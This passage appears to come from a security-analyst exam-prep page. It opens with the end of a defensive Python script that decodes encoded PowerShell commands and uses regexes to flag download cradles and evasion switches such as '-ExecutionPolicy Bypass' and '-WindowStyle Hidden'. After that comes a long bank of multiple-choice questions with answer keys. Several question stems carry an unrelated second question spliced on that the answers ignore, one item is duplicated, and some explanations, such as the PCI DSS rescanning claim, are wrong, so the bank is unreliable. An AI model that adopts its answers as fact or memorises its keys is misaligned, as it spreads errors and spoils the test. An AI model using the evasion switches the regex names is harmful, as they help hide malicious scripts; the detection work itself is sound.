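EVASION = re.compile(r"-W(?:indowStyle)?\s+Hidden|-NoP(?:rofile)?\b|-Exec(?:utionPolicy)?\s+Bypass",
                     re.IGNORECASE)


def extract_encoded(cmdline: str) -> str:
    """Return the base64 argument following -e/-enc/-EncodedCommand, or "" if absent.
    PowerShell accepts any unambiguous prefix of the switch name, so match prefixes."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        t = tok.lower()
        if t.startswith("-") and len(t) >= 2 and "-encodedcommand".startswith(t):
            return toks[i + 1]
    return ""


def decode_powershell(encoded: str) -> str:
    """Base64 -> UTF-16LE text. Re-pads in case a logging field truncated the argument."""
    padded = encoded + "=" * (-len(encoded) % 4)
    return base64.b64decode(padded).decode("utf-16-le", errors="replace")


def triage_cmdline(cmdline: str) -> dict:
    """Decode the command and classify it for the analyst."""
    enc = extract_encoded(cmdline)
    script = decode_powershell(enc) if enc else ""
    findings = {
        "decoded": script,
        "urls": re.findall(r"https?://[^\s'\"]+", script),
        "download_cradle": bool(DOWNLOAD_CRADLES.search(script)),
        "in_memory_execution": bool(EXECUTION.search(script)),
        "evasion_flags": bool(EVASION.search(cmdline)),
    }
    if findings["download_cradle"] and findings["in_memory_execution"]:
        findings["verdict"] = "download-and-execute"
    elif findings["download_cradle"] or findings["evasion_flags"]:
        findings["verdict"] = "suspicious"
    else:
        findings["verdict"] = "needs manual review"
    return findings


if __name__ == "__main__":
    for k, v in triage_cmdline(SAMPLE_CMDLINE).items():
        print(f"{k}: {v}")
```

The URL list is the bridge to the network half of the alert: the host in the decoded script should be the same server the workstation's port-443 connection is going to, and that confirmation is what justifies isolating the workstation rather than only killing the process.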

548
MCQ · medium

During a vulnerability scan, an analyst discovers a high-severity vulnerability on a critical database server. The server is in production and cannot be taken offline. The vendor has released a patch but requires a reboot. Which of the following should the analyst recommend FIRST?

A. Implement a workaround from the vendor.
B. Schedule the patch during the next maintenance window.
C. Apply the patch immediately.
D. Migrate the database to a new server.
Answer: B

This balances security with availability.

Why this answer

Option B is correct because the database server is in production and cannot be taken offline, so the patch must be applied during a scheduled maintenance window to minimize business disruption. The vulnerability is high-severity, but the vendor requires a reboot, which would cause downtime; therefore, the first step is to plan the patch application at the next available maintenance window, not to apply it immediately or implement a workaround that may not fully mitigate the risk.

Exam trap

CompTIA often tests the candidate's ability to prioritize business continuity over immediate remediation, leading candidates to incorrectly choose 'Apply the patch immediately' (Option C) because they focus solely on the high severity without considering the operational impact of a reboot on a critical production server.

How to eliminate wrong answers

Option A is wrong because implementing a workaround from the vendor is a temporary measure that may not fully address the vulnerability and could introduce additional complexity or performance issues; the analyst should prioritize the patch itself. Option C is wrong because applying the patch immediately would cause an unplanned reboot of a critical production database server, leading to unacceptable downtime and potential data loss or corruption. Option D is wrong because migrating the database to a new server is a drastic, time-consuming, and high-risk operation that is not the first recommendation; it should only be considered if patching is impossible or the server is end-of-life.

549
MCQ · hard

A vulnerability report is being prepared for an organization's management. Which of the following is the MOST appropriate structure for this report?

A. Charts showing open vulnerability counts over time, without any narrative
B. List of all vulnerabilities sorted by CVSS score, followed by detailed technical descriptions
C. Executive summary, findings by severity, risk acceptance, remediation timeline
D. Network diagram with vulnerability locations, patch status, and compliance checklists
Answer: C

Correct. This structure provides both high-level and detailed information needed for decision-making.

Why this answer

A standard vulnerability report includes an executive summary for high-level decision-makers, findings grouped by severity, risk acceptance decisions, and a remediation timeline.

550
Multi-Selectmedium

Which TWO of the following are best practices for vulnerability scanning in a PCI DSS compliant environment? (Select TWO)

Select 2 answers
A.Perform quarterly scans
B.Scan only external IP ranges
C.Use a single scanning vendor
D.Scan after any significant network change
E.Use authenticated scanning for more accurate results
AnswersA, E

PCI DSS requirement 11.2 mandates quarterly external and internal scans.

Why this answer

Options A and E are correct. PCI DSS requires quarterly internal and external vulnerability scans, and authenticated (credentialed) scanning produces more accurate results than unauthenticated scanning alone. Option B is incorrect because PCI DSS requires internal scans as well as external scans, so scanning only external IP ranges does not satisfy the requirement.

Option C is incorrect because PCI DSS does not require a single scanning vendor; multiple vendors can be used. Option D is incorrect because post-change scanning is a general best practice but not specifically a PCI DSS requirement for this context.

551
MCQmedium

A WAF generates repeated SQL injection alerts against a login endpoint. The application team says the requests returned HTTP 200. What should the analyst do before declaring compromise? In the containment trade-off phase, which response balances containment with evidence preservation?

A.Review application logs for query errors, authentication events, and abnormal database access
B.Disable the WAF rule because it may be noisy
C.Treat every HTTP 200 as proof of exploitation
D.Ask users to change passwords without checking logs
AnswerA

HTTP 200 can occur for blocked, handled, or successful requests; application and database context determine impact.

Why this answer

Option A is correct because HTTP 200 responses from a WAF-protected endpoint do not rule out successful SQL injection; the application may have processed the malicious input without triggering an HTTP error. Reviewing application logs for query errors, authentication anomalies, and abnormal database access provides direct evidence of whether the injection actually succeeded, which is essential before declaring compromise. This approach balances containment by not disrupting legitimate traffic while preserving forensic evidence for analysis.

Exam trap

The CS0-003 exam often tests the misconception that an HTTP 200 status code definitively indicates no exploitation occurred, when in reality it only reflects the web server's response, not the success or failure of the injected SQL.

How to eliminate wrong answers

Option B is wrong because disabling the WAF rule without investigation removes a critical detection layer, potentially allowing ongoing exploitation and destroying evidence of the attack. Option C is wrong because an HTTP 200 status code only indicates the web server responded normally; it does not confirm that the SQL injection payload executed successfully, as many injections fail silently or are caught by parameterized queries.

552
Multi-Selecthard

An organization is preparing for a compliance audit. Which TWO of the following are essential pieces of evidence to demonstrate effective vulnerability management?

Select 2 answers
A.Network topology diagrams
B.Employee training logs
C.Vulnerability scan reports
D.Patch management reports
E.Incident response playbooks
AnswersC, D

These reports provide evidence of scanning and of the identification of vulnerabilities.

Why this answer

Vulnerability scan reports show identified vulnerabilities, and patch management reports show remediation efforts, together demonstrating the vulnerability management lifecycle.

553
MCQhard

An organization has experienced a data breach involving personal data of EU residents. Under GDPR, what is the maximum time frame within which the organization must notify the supervisory authority?

A.24 hours
B.7 days
C.48 hours
D.72 hours
AnswerD

Correct. GDPR mandates notification within 72 hours.

Why this answer

GDPR Article 33 requires that data breaches be reported to the relevant supervisory authority within 72 hours of becoming aware of the breach, unless the breach is unlikely to result in a risk to individuals' rights and freedoms.

554
MCQmedium

A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an external IP address on port 22. Upon investigation, the analyst finds the workstation is used by a developer who frequently transfers large files to a remote server via SCP. What is the most appropriate classification for this alert?

A.True positive
B.True negative
C.False positive
D.False negative
AnswerC

The alert is triggered by legitimate SCP transfers.

Why this answer

The alert is triggered by legitimate administrative activity (SCP file transfer), so it is a false positive. The analyst should tune the SIEM to reduce similar alerts.

555
MCQeasy

Two servers have the same critical vulnerability. One hosts a public payment API; the other is a lab server isolated from production. What changes the remediation priority? For tool configuration, which scanner or pipeline change most directly improves result quality?

A.The number of installed fonts
B.The colour of the scanner dashboard
C.Asset criticality, exposure, and business impact
D.Whether the hostname is shorter
AnswerC

The same CVE can represent different risk depending on where it exists and what the asset supports.

Why this answer

Remediation priority is determined by risk, which combines asset criticality, exposure, and business impact. The public payment API has high exposure (internet-facing) and high business impact (PCI DSS compliance, financial data), while the lab server is isolated and non-production. A vulnerability scanner like Nessus or Qualys uses asset tags and CVSS environmental metrics (e.g., modified impact sub-scores) to calculate a risk-based priority score, not the number of installed fonts or dashboard color.

Exam trap

The CS0-003 exam often tests the misconception that vulnerability severity alone (e.g., a high CVSS score) determines remediation priority, ignoring that asset context—exposure, criticality, and business impact—is the actual driver of risk-based prioritization.

How to eliminate wrong answers

Option A is wrong because the number of installed fonts is a cosmetic system attribute with no bearing on vulnerability severity, exposure, or business impact; it does not affect CVSS scoring or remediation prioritization. Option B is wrong because the color of the scanner dashboard is a purely aesthetic UI setting that has zero influence on scan results, risk calculation, or the quality of vulnerability detection.

556
MCQhard

A security analyst needs to present the risk of an unpatched critical vulnerability to the board of directors. Which of the following is the most effective way to communicate the risk?

A.Explain the potential financial loss and reputational damage.
B.Show the CVSS score and exploit complexity.
C.Recommend immediate patching without details.
D.Describe the vulnerability in technical terms.
AnswerA

This translates technical risk to business risk.

Why this answer

Boards care about business impact, not technical details. Quantifying financial exposure helps them understand urgency.

557
MCQeasy

During the preparation phase of the NIST SP 800-61 incident response lifecycle, which of the following is the MOST important activity to ensure effective incident response?

A.Using YARA rules to detect malware in the environment
B.Implementing network segmentation to limit lateral movement
C.Conducting a root cause analysis after each incident
D.Creating and training the incident response team
AnswerD

This is a core preparation activity that ensures the team is ready to respond.

Why this answer

Preparation includes creating and training the incident response team, acquiring tools, and establishing procedures. A well-trained team is critical to executing the response effectively.

558
MCQmedium

Which compliance reporting requirement under GDPR mandates that organizations notify the relevant supervisory authority within a specific timeframe after becoming aware of a personal data breach?

A.72 hours
B.7 days
C.24 hours
D.48 hours
AnswerA

GDPR Article 33 requires notification within 72 hours.

Why this answer

GDPR Article 33 requires notification to the supervisory authority within 72 hours of awareness.

559
MCQeasy

Which of the following metrics measures the average time it takes to identify a security incident after it occurs?

A.Patch SLA compliance percentage
B.Mean time to remediate (MTTRem)
C.Mean time to respond (MTTR)
D.Mean time to detect (MTTD)
AnswerD

Correct definition.

Why this answer

MTTD is specifically defined as the average time to detect an incident.

560
MCQhard

A hospital's IT department has been receiving reports from nursing staff that the electronic medical record (EMR) system is responding slowly during peak hours. The network team has verified that the local area network is operating normally and there is no bandwidth congestion. The security analyst reviews the firewall logs and observes repeated outbound connections from the EMR server to an external IP address 198.51.100.23 on TCP port 443 at regular 5-minute intervals. Each connection transfers a small amount of data. The analyst also notes that the EMR server's antivirus software is up to date and no malware has been detected. The hospital's security policy requires that all outbound connections from critical servers be explicitly approved. Further investigation reveals that 198.51.100.23 is associated with a hosting provider in a foreign country. The analyst suspects a data exfiltration. Which of the following actions should the analyst take FIRST?

A.Install a network-based intrusion detection system to monitor the server.
B.Capture and analyze the network traffic between the EMR server and the external IP.
C.Isolate the EMR server from the network and run a full forensic analysis.
D.Block all outbound traffic from the EMR server to the internet immediately.
AnswerB

Capturing and analyzing the traffic provides insight into whether data exfiltration is occurring and what data is being sent, allowing for an informed response.

Why this answer

Option B is correct because the analyst must first confirm whether the outbound connections are actually exfiltrating data or are legitimate (e.g., software updates, license checks). Capturing and analyzing the network traffic (e.g., using tcpdump or Wireshark) allows the analyst to inspect the payload and determine the nature of the data being sent, which is a standard step in incident response before taking more disruptive actions.

Exam trap

CompTIA often tests the principle of 'least disruption first' in incident response, where candidates mistakenly choose an aggressive containment action (like isolation or blocking) before gathering sufficient evidence to confirm the threat.

How to eliminate wrong answers

Option A is wrong because installing a network-based intrusion detection system (NIDS) is a long-term monitoring solution, not an immediate first step to investigate a suspected active exfiltration; it would not provide the specific payload analysis needed now. Option C is wrong because isolating the EMR server and running a full forensic analysis is too disruptive and premature without first confirming that the traffic is malicious; it could halt critical hospital operations unnecessarily. Option D is wrong because immediately blocking all outbound traffic from the EMR server could disrupt legitimate services (e.g., updates, cloud backups) and would destroy evidence of the ongoing communication before it can be analyzed.

561
MCQmedium

A security analyst is configuring a SIEM correlation rule to detect multiple failed login attempts followed by a successful login from the same source IP within a short time window. This pattern suggests a successful brute-force attack. Which of the following correlation types should the analyst use?

A.Thresholding
B.Sequential correlation
C.Aggregation
D.Time-based correlation
AnswerB

Sequential correlation detects events in a specific order, ideal for detecting a pattern of failures followed by success.

Why this answer

Sequential correlation is the correct choice because it detects a specific ordered sequence of events: multiple failed logins followed by a successful login from the same source IP within a defined time window. This pattern is characteristic of a brute-force attack, where an attacker attempts many passwords before succeeding. SIEM tools like Splunk or QRadar use sequential correlation to match event chains where the order matters, not just the count or aggregation of events.

Exam trap

The CS0-003 exam often tests the distinction between sequential correlation and aggregation, where candidates mistakenly choose aggregation because they focus on the 'multiple failed logins' count rather than the required ordered sequence of failures followed by a success.

How to eliminate wrong answers

Option A is wrong because thresholding triggers on a count of events exceeding a threshold (e.g., 10 failed logins) but does not require a subsequent successful login, missing the key pattern of a successful brute-force. Option C is wrong because aggregation groups events by a common attribute (e.g., source IP) but does not enforce an ordered sequence; it would flag any set of failed logins followed by a success even if the success occurred before the failures. Option D is wrong because time-based correlation simply matches events within a time window without requiring a specific order or sequence, so it could match a successful login followed by failed attempts, which is not the brute-force pattern.

562
MCQhard

During a forensic investigation, an analyst needs to acquire volatile memory from a compromised Linux server running a critical application. The server cannot be powered off. Which tool should the analyst use to capture memory with the least impact on the system?

A.LiME
B.avml
C.WinPmem
D.dd
AnswerA

LiME is designed for Linux memory acquisition and minimizes interference with the running system.

Why this answer

LiME (Linux Memory Extractor) is a loadable kernel module that captures memory with minimal footprint, suitable for live acquisition on Linux systems.

563
MCQhard

Your organization has deployed a new web application on a Linux server. The application uses a custom database port (TCP 3307). During a routine vulnerability scan, the scanner reports a critical vulnerability: 'MySQL Server - Unrestricted File Upload (CVE-20XX-XXXX)'. The system administrator confirms that MySQL is not installed; the custom database uses PostgreSQL on port 3307. The scanner likely misidentified the service due to port-based fingerprinting. On further investigation, you find that the scanner's fingerprinting database has an incorrect mapping for port 3307. The PostgreSQL version is current and fully patched. The environment is production and cannot be disrupted. Which of the following is the BEST action to take?

A.Manually update the scanner's database to correct the port mapping.
B.Schedule an immediate patch of the supposed MySQL vulnerability.
C.Apply a workaround to block file upload functionality on port 3307.
D.Mark the vulnerability as a false positive and suppress it for this asset.
AnswerD

Accurately identifies the issue and prevents future alerts.

Why this answer

Option D is correct because the vulnerability report is based on a false positive: the scanner misidentified the service on port 3307 as MySQL due to an incorrect port mapping in its fingerprinting database, while the actual service is a fully patched PostgreSQL. Since MySQL is not installed and no actual vulnerability exists, marking the finding as a false positive and suppressing it for this asset is the appropriate response in a production environment that cannot be disrupted.

Exam trap

CompTIA often tests the candidate's ability to distinguish between a true vulnerability and a false positive caused by service misidentification, trapping those who jump to patching or blocking without verifying the actual service running on the port.

How to eliminate wrong answers

Option A is wrong because manually updating the scanner's database is not a standard or recommended remediation action; scanner databases are vendor-managed, and manual edits could cause further inaccuracies or be overwritten on the next update. Option B is wrong because scheduling an immediate patch for a supposed MySQL vulnerability is unnecessary and potentially disruptive, as MySQL is not installed and the PostgreSQL service is fully patched—applying a non-existent patch wastes resources and may introduce risk. Option C is wrong because applying a workaround to block file upload functionality on port 3307 is irrelevant; PostgreSQL does not have an unrestricted file upload vulnerability, and blocking functionality would disrupt legitimate database traffic without addressing the actual scanner misidentification.

564
MCQmedium

After containing a ransomware incident, the incident response team is conducting post-incident activities. Which action is MOST important to prevent a similar attack in the future?

A.Sharing IOCs with other organizations via a threat intelligence platform
B.Reimaging all affected systems
C.Performing a root cause analysis and implementing remediation
D.Updating the incident response plan
AnswerC

This directly addresses the cause of the incident.

Why this answer

Conducting a root cause analysis identifies the underlying vulnerability or weakness that allowed the attack, enabling targeted remediation.

565
MCQeasy

While supporting a hybrid workforce, a user reports approving an unexpected OAuth consent prompt for an app named 'Invoice Reader'. The app now has mailbox read permissions. What should the incident responder do first? During detection and analysis, which decision is most defensible, and which evidence should guide the decision?

A.Ignore it if MFA is enabled
B.Delete all emails from the mailbox
C.Only reset the user's Windows password
D.Revoke the app grant, review mailbox access, and identify other users who consented
AnswerD

OAuth consent abuse can persist without password access; revoking grants and scoping exposure contains the incident. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the immediate priority is to revoke the malicious OAuth grant to stop the attacker's access, then review the mailbox for any data exfiltration or abuse, and finally identify other users who may have consented to the same app to contain the incident. This follows the NIST SP 800-61 incident response process for detection and analysis, where the most defensible decision is to remove the attacker's foothold and assess the scope of compromise. Ignoring the issue or taking non-targeted actions like password resets or email deletion fails to address the root cause—the OAuth consent grant—which persists independently of user credentials.

Exam trap

CompTIA often tests the misconception that resetting a user's password or enforcing MFA is sufficient to revoke OAuth tokens, when in reality the refresh token persists independently and must be explicitly revoked via the identity provider's admin interface.

How to eliminate wrong answers

Option A is wrong because MFA does not protect against OAuth consent phishing; the attacker obtains a refresh token via the consent grant, which bypasses MFA entirely. Option B is wrong because deleting all emails destroys forensic evidence and does not revoke the attacker's persistent access via the OAuth token. Option C is wrong because resetting the Windows password does not invalidate the OAuth refresh token stored in Azure AD/Entra ID; the app retains mailbox access until the grant is explicitly revoked.

566
MCQhard

A development team wants to find vulnerable open-source libraries before deployment. Which control best fits this stage? For control selection, which control best addresses the stated weakness without hiding risk?

A.Wireless spectrum analysis
B.Physical badge access reviews
C.Database transaction log backups
D.Software composition analysis in the CI/CD pipeline
AnswerD

SCA identifies vulnerable third-party dependencies and can gate builds before release.

Why this answer

Software composition analysis (SCA) is the correct control because it automatically scans the project's dependencies against known vulnerability databases (e.g., NVD, GitHub Advisory Database) to identify vulnerable open-source libraries before deployment. Integrating SCA into the CI/CD pipeline ensures that vulnerabilities are caught early in the development lifecycle, aligning with the shift-left security principle without suppressing or masking risk.

Exam trap

CompTIA often tests the distinction between vulnerability scanning (SCA) and other security controls like network monitoring or physical security, so the trap here is confusing a general security practice (e.g., backups or access reviews) with a specific software dependency scanning control that directly addresses the stated weakness.

How to eliminate wrong answers

Option A is wrong because wireless spectrum analysis (e.g., using tools like Wireshark or spectrum analyzers) is used to detect rogue access points or interference in wireless networks, not to identify vulnerable open-source libraries in code. Option B is wrong because physical badge access reviews control physical access to facilities, not software dependencies or code-level vulnerabilities. Option C is wrong because database transaction log backups are a data recovery and integrity control, unrelated to scanning for vulnerable open-source libraries in a development pipeline.

567
MCQhard

A scanner flags TLS 1.0 on a server, but the service owner says TLS 1.0 is disabled. What is the BEST validation method? For tool configuration, which scanner or pipeline change most directly improves result quality?

A.Change the severity to informational automatically
B.Delete the server from the scan scope
C.Close the finding because the owner disagrees
D.Manually test the service with a TLS client or scanner profile that negotiates protocol versions
AnswerD

Direct protocol validation determines whether TLS 1.0 is actually accepted.

Why this answer

Option D is correct because the most reliable way to validate whether TLS 1.0 is truly disabled is to perform an active, negotiated test using a TLS client (e.g., OpenSSL s_client) or a scanner profile that explicitly attempts to connect using only TLS 1.0. This bypasses any potential misconfiguration in the scanner's service detection or version negotiation logic, and directly confirms whether the server accepts a TLS 1.0 handshake. Relying solely on the scanner's banner grab or the owner's assertion can miss cases where the server still supports the protocol on certain ports or under specific cipher suites.

Exam trap

CompTIA often tests the concept that scanner results must be validated through active, protocol-specific testing rather than relying on configuration assertions or passive detection, and the trap here is assuming that a service owner's claim or a scanner's default detection is sufficient without manual verification.

How to eliminate wrong answers

Option A is wrong because changing severity to informational does not resolve the underlying validation issue; it merely hides the finding and could mask a real vulnerability if TLS 1.0 is actually enabled. Option B is wrong because deleting the server from the scan scope removes all future visibility into that asset, which is an overreaction and prevents ongoing security monitoring. Option C is wrong because closing a finding solely because the owner disagrees violates the principle of independent validation; the scanner's result must be verified through technical means, not dismissed based on opinion.

568
MCQmedium

During incident reconstruction, firewall events appear five minutes earlier than endpoint events for the same connection. What should the analyst check first? In the alert triage phase, which action gives the analyst the clearest next triage step?

A.Prioritize only the source with the highest EPS
B.Time synchronization and timezone normalization across log sources
C.Assume the firewall logs are falsified
D.Delete one source from the timeline
AnswerB

Clock drift and timezone parsing commonly distort event order in SIEM timelines.

Why this answer

Time synchronization and timezone normalization across log sources is the correct first check because a consistent five-minute offset between firewall and endpoint events for the same connection strongly indicates a clock drift or timezone misconfiguration rather than a security anomaly. In incident reconstruction, analysts must ensure all timestamps are aligned to a common reference (e.g., UTC) and that NTP is properly configured on all devices; otherwise, the timeline is unreliable. This step directly addresses the root cause before any triage or prioritization can occur.

Exam trap

The CS0-003 exam often tests the misconception that a timestamp discrepancy automatically indicates log tampering or that high EPS should drive triage priority, when in fact the immediate technical root cause is almost always a time synchronization issue.

How to eliminate wrong answers

Option A is wrong because prioritizing only the source with the highest EPS (Events Per Second) ignores the fundamental time discrepancy and could lead to focusing on a noisy but irrelevant log source while the actual timing issue remains unresolved. Option C is wrong because assuming the firewall logs are falsified without first verifying time synchronization introduces bias and wastes investigative effort; log falsification is a serious claim that requires evidence, not a default assumption when a simple clock skew is the most likely explanation.

569
Multi-Selectmedium

A security analyst is evaluating a Kubernetes cluster for misconfigurations. Which TWO of the following are common Kubernetes misconfigurations that increase security risk? (Select the two best answers.)

Select 2 answers
A.Running containers as non-root user
B.Using hostPath mounts
C.Using privileged containers
D.Enabling Role-Based Access Control (RBAC)
E.Implementing network policies to restrict traffic
AnswersB, C

hostPath mounts give a container access to the host filesystem.

Why this answer

Privileged containers and hostPath mounts are known high-risk misconfigurations in Kubernetes.

570
MCQmedium

A company uses a configuration management tool to enforce CIS Benchmarks on its servers. The security team wants to apply Level 1 benchmarks to all servers to achieve a baseline security posture. Which of the following best describes the difference between CIS Level 1 and Level 2 benchmarks?

A.Level 1 benchmarks are for Linux systems, while Level 2 benchmarks are for Windows systems.
B.Level 1 benchmarks are basic security measures that do not impact system performance, while Level 2 benchmarks are more restrictive and may affect performance or usability.
C.Level 1 benchmarks are for servers, while Level 2 benchmarks are for workstations.
D.Level 1 benchmarks are mandatory, while Level 2 benchmarks are optional.
AnswerB

This accurately describes the intended outcome.

Why this answer

CIS Level 1 benchmarks are intended to provide a clear security benefit without significantly impacting functionality or performance. Level 2 benchmarks provide more stringent security but may reduce functionality or require additional operational effort.

571
MCQmedium

During a traffic analysis, a security analyst observes repeated outbound connections from an internal workstation to an external IP address on TCP port 53 at irregular intervals. The connections are small and occur every few minutes. Which technique is most likely being used?

A.HTTP smuggling
B.TCP handshake anomaly
C.DNS tunneling
D.Beaconing
AnswerC

Using TCP port 53 for data exfiltration is characteristic of DNS tunneling.

Why this answer

DNS normally uses UDP, but TCP port 53 can be used for DNS tunneling. The small, irregular connections to a single external IP suggest data exfiltration via DNS tunneling.

572
MCQmedium

A CASB alert indicates that a user downloaded a file containing sensitive data from a cloud app to an unmanaged device. Which action should the analyst take first?

A.Report the incident to law enforcement
B.Reset the user's password
C.Block the user's cloud app access
D.Investigate the alert to confirm the data exfiltration
AnswerD

Confirmation is necessary before taking action.

Why this answer

The first step is to verify the alert is a true positive by checking the user's activity and the file's sensitivity. Prematurely blocking or reporting may be incorrect if the alert is a false positive.

573
MCQeasy

A security dashboard is being designed for the executive team. Which metric is MOST appropriate to display?

A.Current CPU utilization on firewalls
B.Overall risk posture score with trend over time
C.Patch installation status of all endpoints
D.Number of IDS alerts per hour
AnswerB

Provides a concise summary of security health.

Why this answer

The executive team requires a high-level, strategic view of security effectiveness, not granular operational data. The overall risk posture score with trend over time directly communicates the organization's security health and whether it is improving or deteriorating, enabling informed decision-making. This aligns with the Reporting and Communication domain's emphasis on translating technical metrics into business-relevant insights.

Exam trap

CompTIA often tests the distinction between operational metrics (for technical teams) and strategic metrics (for executives), and the trap here is that candidates mistake a detailed, operational metric like patch status or alert counts as appropriate for an executive dashboard, ignoring the need for aggregated, trended risk visibility.

How to eliminate wrong answers

Option A is wrong because current CPU utilization on firewalls is an operational metric relevant to network engineers for troubleshooting performance issues, not a strategic indicator for executives. Option C is wrong because patch installation status of all endpoints is a detailed, tactical metric that belongs in IT operations or vulnerability management dashboards, not an executive summary. Option D is wrong because the number of IDS alerts per hour is a raw, high-volume data point that lacks context and would overwhelm executives; it requires correlation and analysis to be meaningful.

574
MCQmedium

During a web application security assessment using OWASP ZAP, a tester identifies that the application reflects user input in HTTP responses without proper encoding. Which OWASP Top 10 vulnerability category does this finding most likely belong to?

A.Broken Access Control
B.Cryptographic Failures
C.Security Misconfiguration
D.Injection
AnswerD

XSS is a type of injection where untrusted data is included in output.

Why this answer

Reflected user input in responses without encoding is a classic sign of Cross-Site Scripting (XSS), which falls under Injection in the OWASP Top 10 (XSS was listed as a separate category in some earlier versions, but in the 2021 edition it is grouped under Injection).

575
Multi-Selectmedium

When briefing legal and privacy teams after a suspected data exposure, which details matter? (Choose two.)

Select 2 answers
A.Data types and jurisdictions potentially affected
B.A complete list of unrelated server patches
C.Speculation about attacker identity without evidence
D.Timeline of discovery, containment, and known access
AnswersA, D

Notification duties depend on data and jurisdiction.

Why this answer

Data types (e.g., PII, PHI, PCI) and affected jurisdictions determine legal notification obligations under regulations like GDPR, HIPAA, or CCPA. Jurisdictions dictate breach notification timelines and penalties, making this information critical for legal and privacy teams to assess risk and compliance. Without this detail, the response cannot be properly scoped or legally defensible.

Exam trap

The CS0-003 exam often tests the distinction between operational details (like patch lists) and legally relevant information (data types and jurisdictions), trapping candidates who think all technical details are equally important for legal teams.

576
MCQmedium

During a network traffic analysis, a security analyst observes repeated connections from an internal host to an external IP address on TCP port 53. The traffic volume is low but consistent. What type of anomaly is most likely indicated?

A.Data exfiltration via DNS tunneling
B.Lateral movement using SMB
C.Port scan activity from an internal host
D.Beaconing to a command-and-control server
AnswerA

DNS tunneling uses port 53 and is a common data exfiltration technique, consistent with the pattern observed.

Why this answer

DNS tunneling often uses port 53 to exfiltrate data by encoding it in DNS queries. The consistent low-volume traffic to a single external IP suggests covert communication.

577
Multi-Selecteasy

A security analyst is reviewing alerts from an IDS. Which TWO indicators are most likely to suggest a successful command and control (C2) communication? (Choose two.)

Select 2 answers
A.An inbound connection from a known malicious IP to the mail server
B.A high volume of outbound traffic to an unusual destination IP on port 443
C.A single large file upload to a cloud storage service
D.An internal host performing a DNS query for a known malicious domain
E.Regular beaconing activity to an external IP with consistent payload sizes
AnswersB, E

High-volume outbound traffic to an unusual IP on port 443 could be data exfiltration or C2 traffic masquerading as HTTPS.

Why this answer

B is correct because a high volume of outbound traffic to an unusual destination IP on port 443 (HTTPS) is a classic indicator of data exfiltration or C2 communication, as attackers often use encrypted channels to blend in with legitimate web traffic. The combination of high volume and an unusual destination IP suggests the host is sending data to an external server controlled by the attacker, which is a key sign of an active C2 session.

Exam trap

The CS0-003 exam often tests the distinction between attempted and successful C2 communication, where candidates mistakenly choose indicators like DNS queries or inbound connections as proof of success, but only outbound beaconing or sustained data transfer on unusual ports confirms an established C2 channel.

578
MCQmedium

An organization is implementing a patch management process for servers. Which of the following is a crucial step that should be performed before deploying patches to production servers?

A.Immediately apply the patch to all systems to minimize exposure
B.Review the CVSS score to decide if the patch is necessary
C.Verify patch compliance by checking the vendor's advisory
D.Test the patch in a staging environment that closely mirrors production
AnswerD

Testing ensures stability before production rollout.

Why this answer

Testing patches in a staging environment that mirrors production helps identify issues that could cause outages or incompatibilities.

579
MCQmedium

During a security incident involving a potential data breach, the CISO asks you to prepare a communication for the board of directors. What is the MOST important aspect to emphasize in this communication?

A.The specific malware used and its technical attributes
B.The names of the IT staff who first detected the incident
C.A step-by-step timeline of the incident response actions taken so far
D.The financial impact, reputational risk, and potential regulatory penalties
AnswerD

Business risk communication is key for executive audiences.

Why this answer

Board members are non-technical stakeholders who need to understand the business impact. The communication should translate technical details into financial, reputational, and regulatory consequences.

580
MCQhard

A development team wants to find vulnerable open-source libraries before deployment. Which control best fits this stage? For tool configuration, which scanner or pipeline change most directly improves result quality?

A.Physical badge access reviews
B.Wireless spectrum analysis
C.Software composition analysis in the CI/CD pipeline
D.Database transaction log backups
AnswerC

SCA identifies vulnerable third-party dependencies and can gate builds before release.

Why this answer

Software composition analysis (SCA) is the correct control because it specifically scans open-source libraries for known vulnerabilities (CVEs) and license compliance issues. Integrating SCA into the CI/CD pipeline ensures that vulnerable dependencies are detected automatically before code is deployed, enabling early remediation without manual overhead.

Exam trap

The CS0-003 exam often tests the distinction between vulnerability scanning (SCA) and network or physical controls, expecting candidates to recognize that open-source library risks require a software-focused tool, not a hardware or access control solution.

How to eliminate wrong answers

Option A is wrong because physical badge access reviews control physical security, not software library vulnerabilities; they have no mechanism to inspect open-source code or its dependencies. Option B is wrong because wireless spectrum analysis monitors radio frequency interference and rogue access points, not software libraries; it addresses network-layer threats, not application-layer dependency risks.

581
Multi-Selecthard

During a forensic investigation, an analyst must preserve evidence in accordance with forensically sound procedures. Which THREE of the following practices should the analyst follow? (Select THREE.)

Select 3 answers
A.Run a full antivirus scan on the target drive
B.Document all actions taken in a chain of custody form
C.Use a write blocker when imaging a hard drive
D.Create a cryptographic hash of the original media before imaging
E.Boot the system to ensure it is operational
AnswersB, C, D

Chain of custody ensures evidence admissibility.

Why this answer

Forensically sound procedures include using write blockers to prevent alteration, verifying integrity with hashes, and documenting the chain of custody. Running a live scan would alter data.

582
MCQhard

A security analyst is performing dynamic malware analysis using a sandbox. The analyst observes that the malware creates a scheduled task that executes a PowerShell command to download a payload from a remote server. Which of the following behavioral IOCs should be prioritized for detection?

A.The domain name of the remote server
B.The hash of the initial malware sample
C.The IP address of the remote server
D.The creation of a scheduled task
AnswerD

Scheduled task creation is a persistent and observable behavior across many environments.

Why this answer

The scheduled task creation is a persistent mechanism that can be detected via monitoring for new scheduled tasks.

583
MCQeasy

A security analyst receives an alert about a possible ransomware outbreak. Which short-term containment action should be performed FIRST to prevent further spread?

A.Disable the user account
B.Rebuild the system
C.Update antivirus signatures
D.Isolate the system from the network
AnswerD

Network isolation stops lateral movement and C2 communication immediately.

Why this answer

Network isolation (disconnecting the affected system from the network) is a quick short-term containment step that stops the ransomware from communicating with C2 or spreading laterally.

584
MCQeasy

A company's IDS generated an alert for a SQL injection attempt against a web server. The web application firewall (WAF) is already in place. What is the best action?

A.Update the WAF rules
B.Block the source IP at the firewall
C.Shut down the web server
D.Verify if the attack succeeded by checking server logs
AnswerD

Determines if the WAF blocked the injection or if further action is needed.

Why this answer

Option D is correct because the first step is to verify whether the attack succeeded by checking the server logs. Premature blocking or shutdown may be unnecessary.

585
MCQmedium

A cloud posture scan finds a storage bucket with public read access containing customer exports. What should the team do first? For tool configuration, which scanner or pipeline change most directly improves result quality?

A.Restrict public access and determine whether sensitive data was accessed
B.Wait for the next quarterly review
C.Rotate database administrator passwords only
D.Delete all audit logs to reduce liability
AnswerA

The priority is exposure containment and impact assessment.

Why this answer

